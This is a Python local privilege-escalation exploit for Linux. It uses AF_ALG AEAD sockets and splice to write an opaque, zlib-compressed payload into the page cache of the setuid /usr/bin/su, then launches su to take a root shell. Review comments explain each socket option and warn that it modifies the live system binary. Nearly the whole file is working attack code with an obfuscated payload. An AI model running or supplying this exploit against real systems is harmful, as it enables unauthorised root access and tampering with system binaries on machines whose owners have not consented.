#!/usr/bin/env python3
import os
import zlib
import socket
# Helper: decode a hex string into bytes.
def d(x: str) -> bytes:
    """Hex-decode *x* into bytes.

    Thin wrapper around the builtin hex parser; whitespace between byte
    pairs is tolerated exactly as ``bytes.fromhex`` tolerates it.
    """
    raw = bytearray.fromhex(x)
    return bytes(raw)
# Core exploit routine: one AF_ALG round per 4-byte payload chunk.
def c(su_fd: int, t: int, c: bytes) -> None:
    """Run one AF_ALG AEAD round with ``t + 4`` bytes of ``su_fd`` spliced in as input.

    Args:
        su_fd: Descriptor of the file whose bytes are spliced into the
            algorithm socket; the caller opens /usr/bin/su read-only.
        t: Offset of this chunk within the payload.  It also sizes the
            spliced input (``t + 4`` bytes, always taken from file offset 0)
            and the final recv (``8 + t`` bytes).
        c: The 4-byte payload chunk for this round, appended to four ``A``
            bytes as the message data.  NOTE: this parameter shadows the
            function's own name inside the body -- legal, but confusing.

    Returns:
        None.  Any error raised by the final ``recv`` is swallowed by a bare
        ``except``, so callers cannot distinguish a failed round from a
        successful one.

    NOTE(review): the statement order here is exactly the sequence the kernel
    sees and is load-bearing; nothing was reordered.  The sockets ``a`` and
    ``u`` and both pipe ends are never closed, so every call leaks four
    descriptors until the process exits.  Judging by the trailing
    ``os.system("su")`` in the caller, the intent is presumably to alter what
    the system sees as the real /usr/bin/su rather than a copy -- run this
    only in a disposable VM.
    """
    # 38 = AF_ALG, 5 = SOCK_SEQPACKET, 0 = IPPROTO_IP, written as raw
    # numbers rather than the socket.AF_ALG / socket.SOCK_SEQPACKET names.
    a = socket.socket(38, 5, 0)
    # AEAD transform: authencesn(hmac(sha256), cbc(aes)).
    a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    # Socket level for the ALG_SET_* options.
    SOL_ALG = 279
    setsockopt = a.setsockopt
    # optname 1 (presumably ALG_SET_KEY -- confirm against linux/if_alg.h):
    # a 40-byte blob, 8 fixed bytes followed by 32 zero bytes.
    setsockopt(SOL_ALG, 1, d('0800010000000010' + '0' * 64))
    # optname 5 with optlen 4 and no value (presumably ALG_SET_AEAD_AUTHSIZE
    # = 4 -- confirm).
    setsockopt(SOL_ALG, 5, None, 4)
    # The per-operation socket is obtained by accept() on the bound socket.
    u, _ = a.accept()
    send_len = t + 4
    zero_byte = d('00')
    # Message data: four filler bytes + the 4-byte chunk.  Ancillary items,
    # by optname (all meanings presumed from linux/if_alg.h -- confirm):
    #   3 -> four zero bytes       (ALG_SET_OP, value 0)
    #   2 -> 0x10 + 19 zero bytes  (ALG_SET_IV: ivlen 16, then 16 zero IV bytes)
    #   4 -> 0x08 + 3 zero bytes   (ALG_SET_AEAD_ASSOCLEN = 8)
    # flags 32768 is presumably MSG_MORE, so the spliced bytes below are
    # treated as a continuation of this message.
    u.sendmsg(
        [b"A" * 4 + c],
        [(SOL_ALG, 3, zero_byte * 4),
         (SOL_ALG, 2, b'\x10' + zero_byte * 19),
         (SOL_ALG, 4, b'\x08' + zero_byte * 3)],
        32768
    )
    # Move t + 4 bytes of the file, always starting at file offset 0
    # (offset_src=0 leaves the descriptor's own position untouched), through
    # a pipe into the operation socket.  os.splice requires Python 3.10+ on
    # Linux.
    r_fd, w_fd = os.pipe()
    os.splice(su_fd, w_fd, send_len, offset_src=0)
    os.splice(r_fd, u.fileno(), send_len)
    # Read back 8 + t bytes from the operation socket.  The bare except also
    # swallows KeyboardInterrupt and SystemExit; at minimum this should be
    # `except OSError`, and the failure should be surfaced so a silent no-op
    # run is distinguishable from success.
    try:
        u.recv(8 + t)
    except:
        pass
# Entry point: drive the exploit over the payload, then invoke su.
if __name__ == "__main__":
    # The real setuid binary, opened read-only (flags 0).  The descriptor is
    # never closed; the process exits right after.  NOTE(review): this acts
    # on the live system binary, not a copy -- run only in a disposable VM.
    su_fd = os.open("/usr/bin/su", 0)
    index = 0
    # Opaque zlib-compressed blob.  Its decoded contents are not inspected
    # here; nothing below depends on their meaning beyond 4-byte chunking.
    payload = zlib.decompress(
        d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
    # Hand each 4-byte chunk, together with its offset, to c().  If
    # len(payload) is not a multiple of 4 the final slice is shorter than 4
    # bytes; the loop does not guard against that.
    while index < len(payload):
        c(su_fd, index, payload[index:index + 4])
        index += 4
    # Hand control to su through the system shell, inheriting the current
    # environment unchanged.
    os.system("su")